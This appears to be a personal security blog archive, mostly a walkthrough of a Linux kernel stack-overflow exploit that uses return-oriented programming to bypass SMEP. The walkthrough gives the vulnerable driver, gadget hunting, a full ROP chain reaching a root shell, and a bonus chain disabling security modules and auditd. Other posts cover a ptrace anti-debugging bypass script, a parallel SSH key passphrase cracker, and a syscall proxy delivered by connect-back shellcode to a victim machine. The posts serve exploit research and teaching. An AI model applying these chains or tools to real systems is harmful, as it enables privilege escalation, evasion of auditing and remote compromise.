Beat SMEP on Linux with Return-Oriented Programming

Introduction

In this post, I will show you how easy it is to use Return-Oriented Programming in the Linux kernel and how it can bypass protections such as SMEP, available in the next generation of Intel processor.

Linux buggy module

In order to simplify exploitation I have decided to develop a buggy driver containing a stack overflow.

Here is the important code (kbof.c):

struct kbof {
	size_t size;
	char *buf;
};

static int kbof_stackbof(struct kbof *kb)
{
	char buf[64];

	printk(KERN_INFO "kbof_stackbof: buf = %p size = %u\n", kb->buf, kb->size);

	if (copy_from_user(buf, kb->buf, kb->size))
		return -EINVAL;

	return 0;
}

static long kbof_ioctl(struct file *fp, unsigned int cmd, unsigned long arg)
{
        struct kbof kb;

        if (copy_from_user(&kb, (struct kbof *)arg, sizeof(kb)))
                return -EINVAL;

        switch (cmd) {
        case KBOF_STACKOVF:
                return kbof_stackbof(&kb);
        }

        return 0;
}

This is a really simple stack overflow where you can control both the buffer and the length of the overflow.

This code path can be reached via an ioctl. The char device created for the module is /dev/kbof.

make
mknod /dev/kbof c 60 0
chmod 666 /dev/kbof
insmod ./kbof.ko

Finding the size of the overflow

First of all, we need to get the size of the overflow.
objdump gives us the answer :

kbof_stackbof:
push   %rbp
mov    %rsp,%rbp
push   %rbx
sub    $0x58,%rsp
...
mov    -0x20(%rbp),%rdx   # %rdx = size
mov    -0x18(%rbp),%rsi   # %rsi = src
lea    -0x60(%rbp),%rdi   # %rdi = buf
callq  0 
...
retq

The buffer is 0×60 bytes below %rbp (the Fedora kernel is compiled without -fomit-frame-pointer). So the return address is stored 104 bytes (0×60 + 0×8) after buf.

SMEP vs kernel exploits

While the Linux kernel is easy to exploit and offers only few protections, patches such as PaX or processor features such as SMEP make current exploits unusable.
SMEP is a feature that will be present in the next generation of Intel processors (Ivy bridge). It prevents code in userspace (U/S=1 in page table entry) from being executed in ring0 mode (CPL=0).

SMEP

It means that we can’t jump to our exploit process address space and execute our payload (get root credentials, execute a shell). This is where ROP come to our rescue : as we return in the kernel address space (U/S=0), no fault will be triggered by the cpu.

Finding gadgets

To achieve successful ROP exploitation, we have to find gadgets in the linux kernel image. As the kernel is a changing a lot, I used “git log” to find files that did not change much between releases. Several asm files (.S) in the arch/x86 directory have not changed for the last months. If we look at these files, we can see ROP instructions :

arch/x86/lib/rwsem_64.S:

call_rwsem_downgrade_wake:
...
popq %r11
popq %r10
popq %r9
popq %r8
popq %rcx
popq %rsi
popq %rdi
ret

arch/x86/lib/rwlock.S:

__read_lock_failed:
decl (%rdi)
js __read_lock_failed
ret

To find other gadgets we have to disassemble the linux kernel image.
An example of how to extract a gzip compressed kernel image (1f8b0800 is the gzip signature) :

$ od -A d -t x1 /boot/vmlinuz-2.6.38.6-26.rc1.fc15.x86_64 | grep '1f 8b 08 00'
0017504 48 8d 83 c0 78 3a 00 ff e0 1f 8b 08 00 86 52 c8
$ dd if=/boot/vmlinuz-2.6.38.6-26.rc1.fc15.x86_64 bs=1 skip=17513 | zcat > vmlinux

And we use objdump to find gadgets. For example :

$objdump -d ./vmlinux |grep "mov    %rax,%rdi" -A1| grep "callq" -B1
...
ffffffff8108fc6e:       48 89 c7                mov    %rax,%rdi
ffffffff8108fc71:       ff d2                   callq  *%rdx
...

objdump best ROP tool ever ! :D

Kernel ROP exploit

Current exploits trigger a kernel bug and redirect the execution to a function similar to kernelcode() :

void kernelcode()
{
        commit_creds(prepare_kernel_creds(NULL));
        asm volatile(
          "swapgs\n"
          "movq %0, 0x20(%%rsp)\n"
          "movq %1, 0x18(%%rsp)\n"
          "movq %2, 0x10(%%rsp)\n"
          "movq %3, 0x8(%%rsp)\n"
          "movq %4, 0x0(%%rsp)\n"
          "iretq\n"
          : : "r" (user_ss), "r" (stack + sizeof(stack) / 2),
              "r" (user_rflags), "r" (user_cs), "r" (userland_code));
}

This function set root credentials to our process and return to userland (CPL=3).
I decided to take the same approach for my ROP exploit.

ROP : getting root privileges

Calling prepare_kernel_creds with the first argument set to NULL is easy. The following stack frame does this :

[ ... ]
[  POP_RDI_RET            ]
[  0UL                    ]
[  @prepare_kernel_creds  ]
[ ... ]

Remember that %rdi is defined as the first argument of a function by the x86_64 ABI.

But it’s tricky to get the return value of prepare_kernel_creds (%rax) and use it as the commit_creds argument (%rdi). With the help of objdump, we find an interesting sequence :

ffffffff8108fc6e:       48 89 c7                mov    %rax,%rdi
ffffffff8108fc71:       ff d2                   callq  *%rdx

We can’t directly set %rdx to commit_creds because the call instruction push the return address on the stack. To understand how it actually works, look at the final ROP payload below.

ROP : returning to userland

Now that we have root credentials on the machine, we would like to return to our userland process.
paranoid_swapgs is a good candidate :

paranoid_swapgs:
swapgs
[ restore registers ]
add    $0x30,%rsp
[ restore registers ]
add    $0x50,%rsp
jmpq   irq_return # iretq

Final ROP payload

And the final ROP payload is :

[  POP_RDI_RET           ]
[  0UL                   ]
[  @prepare_kernel_cred  ]
[  @POP_RDX_RCX_RET      ]
[  @POP_RCX_RET          ]
[  JUNK                  ]
[  @MOV_RAX_RDI_CALL_RDX ]
[  @commit_creds         ]
[  @paranoid_swapgs      ]
[  0x30 + 0x50 bytes junk]
[  @exec_shell           ]
[  user_cs               ]
[  user_rflags           ]
[  @stack                ]
[  user_ss               ]

Time to test our exploit :

[falken@vm-F15 kernel_overflow]$ ./exploit_rop
[+] call_rwsem_downgrade_wake is at 0xffffffff81232500
[+] prepare_kernel_cred is at 0xffffffff81074718
[+] commit_creds is at 0xffffffff81074403
[+] paranoid_swapgs is at 0xffffffff8147611d
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:kernel_t:s0

W00t !

Bonus : disable security modules & auditd

Disabling security modules can be done by calling reset_security_ops :

static struct security_operations default_security_ops = {
        .name   = "default",
};
...
void reset_security_ops(void)
{
        security_ops = &default_security_ops;
}

In order to disable auditd we have to set the variable audit_enabled to 0. This variable is set to 1 when auditing is enabled.

In rwsem_64.S, we find the perfect gadget :

decl (%rdi)
js __read_lock_failed	# not taken since (%rdi) == 0
ret

And the corresponding stack frame will be :

[   @POP_RDI_RET          ]
[   @audit_enabled        ]
[   @DEC_RDI_ADDR_RET     ]
[   @reset_security_ops   ]

Other ideas to bypass SMEP

  • Disable SMEP by flipping the proper bit in CR4.
  • Allocate a RWX page, copy our shellcode and jump to it.
  • Store the ROP payload in userspace as SMEP does not prevent kernel code from accessing userland data.

Conclusion

For sure SMEP will make kernel exploitation harder. Used with a relocatable kernel and kernel symbols hiding, the ROP technique presented here starts to be very difficult to realize… If there are no information leakage.

Links & code :

SMEP: What is It, and How to Beat It on Linux
SMEP: What is it, and how to beat it on Windows

Buggy module + classic exploit + ROP exploit for kernel-2.6.38.6-26.rc1.fc15.x86_64 (default Fedora 15 kernel)

Bypass ptrace anti-debugging technique with gdb scripting

In this quickpost I just want to show you how to use gdb scripting to bypass
PTRACE_TRACME anti-debugging technique.

ptrace will fail when the process is already being debugged. The following code implements such a check.

int main(void)
{
	if (ptrace(PTRACE_TRACEME, 1, 1, 1) < 0) {
		printf("Running in a debugger\n");
	} else {
		printf("Safe to run\n");
	}

	return 0;
}

Let’s have a look at the disassembly :

   0x0000000000400534 <+0>:	push   rbp
   0x0000000000400535 <+1>:	mov    rbp,rsp
   0x0000000000400538 <+4>:	mov    ecx,0x1
   0x000000000040053d <+9>:	mov    edx,0x1
   0x0000000000400542 <+14>:	mov    esi,0x1
   0x0000000000400547 <+19>:	mov    edi,0x0
   0x000000000040054c <+24>:	mov    eax,0x0
   0x0000000000400551 <+29>:	call   0x400438 <ptrace@plt>
   0x0000000000400556 <+34>:	test   rax,rax
   0x0000000000400559 <+37>:	jns    0x400567 <main+51>
   0x000000000040055b <+39>:	mov    edi,0x40066c
   0x0000000000400560 <+44>:	call   0x400418 <puts@plt>
   0x0000000000400565 <+49>:	jmp    0x400571 <main+61>
   0x0000000000400567 <+51>:	mov    edi,0x400682
   0x000000000040056c <+56>:	call   0x400418 <puts@plt>
   0x0000000000400571 <+61>:	mov    eax,0x0
   0x0000000000400576 <+66>:	pop    rbp
   0x0000000000400577 <+67>:	ret

A simple solution to bypass the check is to modify %rax (ptrace return value) at main+34.

gdb$ b *0x0000000000400556
gdb$ r
Breakpoint 1, 0x0000000000400556 in main ()
gdb$ set $rax=0
gdb$ c
Safe to run
Program exited normally.

This is a really simple trick. To be more efficient while hacking I have implemented
a gdb script that will make the whole process for you.

set $64BITS = 1
set $ptrace_bpnum = 0

define ptraceme
    catch syscall ptrace
    commands
        if ($64BITS == 0)
            if ($ebx == 0)
	        set $eax = 0
                continue
            end
        else
            if ($rdi == 0)
                set $rax = 0
                continue
            end
        end
    end
    set $ptrace_bpnum = $bpnum
end
document ptraceme
Hook ptrace to bypass PTRACE_TRACEME anti debugging technique
end

define rptraceme
    if ($ptrace_bpnum != 0)
        delete $ptrace_bpnum
        set $ptrace_bpnum = 0
    end
end
document rptraceme
Remove ptrace hook
end

Add this script to your .gdbinit and use the ptraceme command to bypass the ptrace anti-debugging technique.

Parallel ssh private key cracker

Note : From now on, I have decided to write this blog in english to reach a broader audience.


I recently had to recover a lost passphrase from a ssh private key. I “googled” a bit and find two tools. Unfortunately, both of them were single threaded. So I decided to write my own tool. The link is available at the end of this post.

Threads vs multiple processes

Since I am quite interested in parallelism, I am going to explain the benefits, in my case, to use processes over threads.

The following is an example of a single threaded ssh private key cracker found here :

int
main(int argc, char *argv[])
{
 FILE *fp = fopen(argv[1], "r");
 EVP_PKEY *pk;
 char *ptr;
 char pwd[1024];

 SSL_library_init();
 pwd[0] = '\0';
 while (1)
 {
  if (!fgets(pwd, sizeof pwd, stdin))
  {
   printf("Password not found.\n");
   exit(0);
  }
  ptr = strchr(pwd, '\n');
  if (ptr)
   *ptr = '\0';
  pk = PEM_read_PrivateKey(fp, NULL, NULL, (char *)pwd);
  if (pk)
  {
   printf("----> pwd is '%s' <-----\n", pwd);
   exit(0);
  }
 }

 return 0;
}

If you are planning to use threads to parallelize the loop, you have to check which functions are thread safe. This is the case for almost every POSIX functions (See man 7 pthreads). PEM_read_PrivateKey can safely be used in a multi-threaded application provided that two callbacks are registered, one for returning the current thread id and one for locking shared data structures (See man 3ssl threads).
Unfortunately, it seems that PEM_read_PrivateKey can't be made thread safe, which seems normal because I see few reasons for this function to be called in several threads.

The basic workaround is to use code locking :

pthread_mutex_lock(&pk_lock);
pk = PEM_read_PrivateKey(fp, NULL, NULL, (char *)pwd);
pthread_mutex_unlock(&pk_lock);

By doing this, we completely annihilate the benefits of threading because PEM_read_PrivateKey, the most time consuming function, will only be executed in one thread. Remember, threading is not always the good choice when coming to performance on multicore systems : It means shared data, and so probably locking which may decrease performance. That's why I have decided to use multiple processes : each process has its own copy of the data, so no locking is needed !

Code + parallel programming documentation

The code can be found here :
http://falken.tuxfamily.org/uploads/ssh-pk-crack.tar.bz2

Parallel programming documentation:
An introduction to parallel programming
perfbook

Enjoy !

Installer des tools de sécurité sur Fedora

Comme vous le savez peut être, Fedora propose un security spin qui a pour but de rassembler un certain nombre de tools de sécurité. Malheureusement, il n’est pas possible de les installer via un groupe (i.e. yum groupinstall). J’ai donc conçu un petit script qui se charge de récupérer et d’installer la liste des packages :

#!/bin/bash

if [ `whoami` != "root" ]
then
	echo "This script must be run as root"
	exit 127
fi

PKGS=$(curl https://fedorahosted.org/security-spin/wiki/availableApps 2>/dev/null | \
	python -c "import re; \
		   import sys; \
		   print \" \".join(re.findall('([a-zA-Z0-9]*)<\/span>', str(sys.stdin.readlines())))");

yum install -y ${PKGS}

Userspace spinlocks

Un petit trick avec les builtins de gcc pour faire des fonctions de synchronisation en quelques lignes de code :

typedef int spinlock_t;

static inline void spin_lock(spinlock_t *lock)
{
        while (__sync_lock_test_and_set(lock, 1));
}

static inline void spin_unlock(spinlock_t *lock)
{
        __sync_lock_release(lock)
}
static inline void spin_lock_init(spinlock_t *lock)
{
        *lock = 0;
}

Il s’agit en faite d’instructions de type TestAndSet indispensable à la conception de méchanisme de synchronisation. Les fonctions builtins de gcc sont documentées là : http://gcc.gnu.org/onlinedocs/gcc-4.4.4/gcc/Atomic-Builtins.html

Pour les curieux, voici l’assembleur obtenu avec objdump :

0000000000400614 :
  400614:       55                      push   %rbp
  400615:       48 89 e5                mov    %rsp,%rbp
  400618:       48 89 7d f8             mov    %rdi,-0x8(%rbp)
  40061c:       90                      nop
  40061d:       48 8b 55 f8             mov    -0x8(%rbp),%rdx
  400621:       b8 01 00 00 00          mov    $0x1,%eax
  400626:       87 02                   xchg   %eax,(%rdx)
  400628:       85 c0                   test   %eax,%eax
  40062a:       75 f1                   jne    40061d 
  40062c:       c9                      leaveq
  40062d:       c3                      retq
000000000040062e :
  40062e:       55                      push   %rbp
  40062f:       48 89 e5                mov    %rsp,%rbp
  400632:       48 89 7d f8             mov    %rdi,-0x8(%rbp)
  400636:       48 8b 45 f8             mov    -0x8(%rbp),%rax
  40063a:       0f ae f0                mfence /* sérialisation */
  40063d:       c7 00 00 00 00 00       movl   $0x0,(%rax)
  400643:       c9                      leaveq
  400644:       c3                      retq

A noter pour les connaisseurs : l’instruction xchg est atomique lorsque une des opérandes est une adresse mémoire. Si ce n’était pas le cas deux threads pourraient se retrouver en section critique en même temps.
Je vous laisse deviner comment :)

Syscall proxy updates

J’ai largement modifié le shellcode faisant office de syscall proxy : ce dernier est maintenant récupéré sur la machine victime par un shellcode connect-back.

L’exploitation se déroule donc dans cette ordre :

- on lance le stage2 (voir stage2.c) qui attend que le shellcode reverse_tcp se connecte
- on exploite la faille en injectant le shellcode reverse_tcp (stage1)
- le shellcode reverse_tcp se connecte sur notre stage2
- le stage2 envoie le shellcode syscall proxy
- on peut maintenant exécuter des appels systèmes sur la machine cible

stage2.c:

#include "libc_sp.h"
int main(void)
{
int sock = wait_connect_back(4444);

/* envoie du shellcode syscall proxy */
send_sp_shellcode(sock);

/* les appels systèmes sont lancés sur la machine victime */
sp_write(1, "Hello\n", 6);
sp_write(1, "Youpi\n", 6);

char *args[] = {"/bin/ls",  "-l", "/", NULL};
sp_execve(args[0], args, NULL);

return 0;
}

En ce qui concerne le shellcode reverse_tcp j’ai codé un petit programme C qui permet de générer le connect-back avec le bon couple ip/port :
./gen_shell ip port

L’archive est disponible ici : syscall_proxy.tar.bz2

Syscall proxying

OMG, j’ai retrouvé un bout de code que j’ai programmé il y a un petit moment permettant de faire du syscall proxying.
Pour ce qui souhaitent en savoir plus sur cette technique les slides de M. Caceres sont ici : Syscall Proxying

Je ne reverse pas Windows au petit déjeuner donc si vous avez des corrections à donner au niveau de l’asm, envoyez moi un petit mail.
Le shellcode ne fait pas de bind + accept mais reçoit la socket en ebp+8 comme une fonction classique en asm IA32.

Vous trouverez le code ici

AMD64 red zone

Ce post décrit une petite particularité dans la gestion de la pile sur l’arch AMD64 : la red zone. Je vais directement vous montrer de quoi ça s’agit avec un exemple.

void leaf_func(void)
{
	int j = 0;
}
void func(void)
{
	int i = 0;
	leaf_func();
}
int main(void)
{
	func();
	return 0;
}

Ce qui donne en assembleur :

Dump of assembler code for function leaf_func:
   0x0000000000400474 <+0>:	push   %rbp
   0x0000000000400475 <+1>:	mov    %rsp,%rbp
   0x0000000000400478 <+4>:	movl   $0x0,-0x4(%rbp)
   0x000000000040047f <+11>:	leaveq
   0x0000000000400480 <+12>:	retq

Dump of assembler code for function func:
   0x0000000000400481 <+0>:	push   %rbp
   0x0000000000400482 <+1>:	mov    %rsp,%rbp
   0x0000000000400485 <+4>:	sub    $0x10,%rsp
   0x0000000000400489 <+8>:	movl   $0x0,-0x4(%rbp)
   0x0000000000400490 <+15>:	mov    $0x0,%eax
   0x0000000000400495 <+20>:	callq  0x400474
   0x000000000040049a <+25>:	leaveq
   0x000000000040049b <+26>:	retq

Vous voyez la différence entre les deux fonctions ? “func” fait de la place sur la pile pour les variables locales (en l’occurrence i) avec un sub $0×10, %rsp, ce qui n’est pas le cas de “leaf_func”. “leaf_func” utilise la zone en dessous de %rsp pour stocker la variable j.
En fait “leaf_func” n’appelle pas d’autres fonctions, elle peut donc utiliser la zone en dessous de %rsp sans risquer que j soit écrasée. Il s’agit de la red-zone. Cette zone correspond aux 128 bytes en dessous de %rsp et peut être utilisée comme stack frame par les fonctions “feuilles” (ie qui n’appellent pas d’autres fonctions) ou comme zone temporaire, pour swapper deux variables par exemple (l’appelle à une fonction écrasera la red zone).

Voilà à quoi ressemble la stack sur AMD64 :

[ saved RIP ]
[ saved RBP ] <---- %rbp
[   local   ]
[    ...    ]
[ variables ] <---- %rsp (aligné sur 16bytes)
[ red-zone  ]
[    ...    ]
[redzone end] <----- -128(%rsp)

Cette organisation à quelques avantages :

  • %rsp pointe toujours sur la fin de la stack frame, ce qui veut dire qu’on peut adresser les variables avec %rsp et utiliser %rbp comme registre général
  • les fonctions “feuilles” peuvent directement utiliser la red zone comme stack frame

Pour plus d’info je vous renvoie ici (Voir la section 3.2.2)

Si vous développez votre propre OS, je vous conseille de compiler avec l’option -mno-red-zone : quand une interruption logicielle est déclenchée, il est possible que la red-zone soit écrasée quand le CPU sauvegarde %ss, %rsp, %rflags, %cs, %rip sur la pile en mode noyau. Si une fonction du noyau est préemptée par une soft-interrupt alors qu’elle utilise la red-zone, les variables temporaires seront écrasées et ça risque de faire mal lorsque notre fonction va reprendre son exécution.

Hello world

Je fais comme tout le monde, j’ouvre mon blog :-)

Enjoy.

Return top